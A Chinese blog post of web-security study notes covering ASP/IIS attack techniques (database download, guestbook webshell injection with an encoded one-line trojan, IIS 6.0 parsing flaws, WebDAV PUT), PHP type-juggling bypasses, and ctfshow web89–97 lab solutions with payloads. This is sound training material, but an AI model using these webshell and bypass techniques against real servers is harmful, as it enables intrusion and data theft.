安全基础~web攻防特性1

文章目录

  • 知识补充
  • ASP安全
  • Aspx安全分析与未授权访问
  • php特性&web89~97
    • 靶场练习ctfshow

知识补充

使用thinkphp开发的框架,其首页访问指向public目录,指向其中的index.php文件
安全基础~web攻防特性1_第1张图片
安全基础~web攻防特性1_第2张图片
指向的index.php打开网页后是如下情况,代码如下
定义应用目录,是将文件首页展示在上图的application目录下,其下有index.php文件

// 定义应用目录
define('APP_PATH', __DIR__ . '/../application/');
// 加载框架引导文件
require __DIR__ . '/../thinkphp/start.php';

安全基础~web攻防特性1_第3张图片
application目录index.php文件
安全基础~web攻防特性1_第4张图片
thinkphp框架首页访问的目录
安全基础~web攻防特性1_第5张图片
想要得到的目录与首页的关系
http://127.0.0.1:8088/index.php/index/index/index
index.php为应用入口的文件,接着为index目录,index类(模块),index方法;

所以在一下目录创建另一个类,访问时,更换后面的方法即可。访问页面变为1index字符串
http://127.0.0.1:8088/index.php/index/index/ix
安全基础~web攻防特性1_第6张图片
http://127.0.0.1:8088/index.php/index/ceshi/test

安全基础~web攻防特性1_第7张图片
HTTP 常见方法
文件路径的正斜杠(/)与反斜杠(\)

ASP安全

Microsoft Active Server Pages(ASP)是服务器端脚本编写环境。
主要包含MDB下载植入&IIS短文件名&写权限&解析

环境搭建组合windows iis  asp  access/sql server

主要包含ASP-数据库-MDB默认下载access数据库一般后缀名mdb(下载)、asp 、asa (执行解析)
mdb文件在网站目录下,思路:如果知道数据库的地址,可尝试下载获取数据库文件,获取当前管理员账号密码信息。
默认下载:使用asp+access数据库,却不修改默认mdb地址。IIS不能解析MDB文件,当成普通文件下载。(文件服务器端不会解释,客户端浏览器也不会解释,所以就下载到本地。)
思路:位置地址:如果没有修改默认数据库文件位置可尝试默认数据库配置(即本地搭建后默认存放的数据库文件与其他文件位置(比如admin后台管理页面等),没修改。)或采用扫描

ASP-数据库-ASP后门植入连接数据库是asp,asp可解析,向asp数据库文件写入一句话木马可以直接连上去,此时访问数据库文件将会被服务器当成代码文件执行,所以图片里面的代码就会被执行。
以aspcms为例:
aspcms主要是信息发布系统,数据库默认配置为asp,目录在/data/data.asp下。
漏洞成因:在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库。
利用方法:保证默认数据库路径未更改且可留言。

┼攠數畣整爠煥敵瑳∨≡┩愾

ASP-中间件-IIS短文件名探针-安全漏洞为兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3 短文件名。
在Windows下查看对应的短文件名,可以使用命令 dir /x
短文件名特征:

\1) 只有前六位字符直接显示,后续字符用~1指代。其中数字1还可以递增,如果存在多个文件名类似的文件(名称前6位必须相同,且后缀名前3位必须相同)。
\2) 后缀名最长只有3位,多余的被截断。
\3) 访问构造的某个存在的短文件名,会返回404
\4) 访问构造的某个不存在的短文件名,会返回400

ASP-中间件-IIS文件上传解析-安全漏洞在 Windows 2003 IIS 6.0 下有两个漏洞,IIS 6.0并不是只根据文件的最后一个后缀名来判断文件的运行方式,这就引发了IIS目录解析漏洞和文件名解析漏洞。
目录解析:对于名字为**.asp后缀的文件夹**,IIS会将该文件夹内部的文件都解析为.asp文件来执行。即a.asp/1.jpg中的1.jpg会作为asp文件执行。
文件名解析:对于名字诸如a.asp;.jpg文件,IIS并非以最后一个后缀名来判断格式,故会将其解析为asp文件并执行。即如果上传木马的后缀为 .asp;.jpg 就可以被服务器执行。

ASP-中间件-IIS配置目录读写-安全配置在web服务扩展中开启了WebDAV,配置了可以写入的权限,存在PUT任意文件写入漏洞。

web之ASP安全参考文章
小迪讲解参考
复现靶场应用:墨者_IIS写权限漏洞分析溯源

Aspx安全分析与未授权访问

未授权访问
判断用户的身份(后台有多个功能性的文件页面):

  1. 在每个文件里添加验证的代码,通常为cookie
  2. 创建一个专门的文件用于判断,其它验证文件包含它

找未授权访问

  1. 找那些没有包含验证代码的文件
  2. 判断验证代码是否有绕过的可能

.net是c#的框架,其源码反编译,课直接拖进ILSpy中。
aspx开发网站会存在信息泄露,在网站根目录下的web.config配置文件中customError设置,导致报错信息造成的信息泄露。

ASP.NET审计参考

php特性&web89~97

  • =====的区别:https://blog.csdn.net/qq_63792137/article/details/127594787
    弱=时,不比较类型,如==1时,1.0,+1,1a等都一样
    强=时,必须数据类型也一样
  • MD5 =====的比较
    若=用0e绕过,强=用数组绕过
  • intval缺陷绕过 int intval ( mixed $var [, int $base = 10 ] )
    php中intval函数 是用于获取变量的整数值,当后面的base为0时,可根据输入的进制数转为10进制。
    echo intval(4.2);                     // 4
    echo intval('42');                    // 42
    echo intval('+42');                   // 42
    echo intval('-42');                   // -42
    echo intval(042);                     // 34
    echo intval('042');                   // 42
    echo intval(1e10);                    // 10000000000
    echo intval(1e10);                    // 10000000000
    echo intval('1e10');                  // 10000000000
    echo intval(0x1A);                    // 26
    echo intval(42000000);                // 42000000
    echo intval(420000000000000000000);   // 0
    echo intval('420000000000000000000'); // 2147483647
    echo intval(42, 8);                   // 42
    echo intval('42', 8);                 // 34
    echo intval(array());                 // 0
    echo intval(array('foo', 'bar'));     // 1
    
  • strpos()函数,查找字符串在另一字符串中第一次出现的位置(区分大小写)
    安全基础~web攻防特性1_第8张图片
    可以利用换行进行绕过(%0a)url编码是回车换行,当返回的位置为0时,if判断也是false,所以输出的也是false。
  • in_array第三个参数安全
    bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] )搜索数组中是否存在指定的值。
    第三个参数为true时,检查搜索的数据与数组的值的类型是否相同。
    安全基础~web攻防特性1_第9张图片安全基础~web攻防特性1_第10张图片
    PHP代码审计04之strpos函数使用不当
  • preg_match:用于执行一个全局正则表达式匹配
    preg_match只能处理字符串,如果不按规定传一个字符串,通常是传一个数组进去,这样就会报错
    /i:不区分大小写
    /m:换行匹配
    安全基础~web攻防特性1_第11张图片
  • str_replace:其他字符替换字符串中的一些字符,开发中用于过滤某些字符串
    但是其仅仅只过滤一次,所以可以双写进行绕过
    安全基础~web攻防特性1_第12张图片

靶场练习ctfshow

web89:数组绕过

include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

pyload:?num[]=1

web90:强类型比较

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

pyload:?num=4476.0或0x117c

web91:/m换行匹配

show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
}

pyload:?cmd=%0aphp

web92:弱类型比较

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

pyload:?num=4476.1abc

web93:弱类型,过滤字母

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

pyload:?num=4476.1或8进制绕过

web94:强类型,必须为整数,判断传入是否有0

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

pyload:?num=%20010574或用%0a绕过(20为空格)

web95:与上题一样,多过滤了一个“.”

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

pyload:?num=%20010574或用%0a绕过(20为空格)

web96:访问当前目录文件

highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }
}

pyload:?u=./flag.php

web97:MD5强=绕过

include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}

pyload:a[]=1&b[]=s

你可能感兴趣的:(安全学习,安全,前端,android)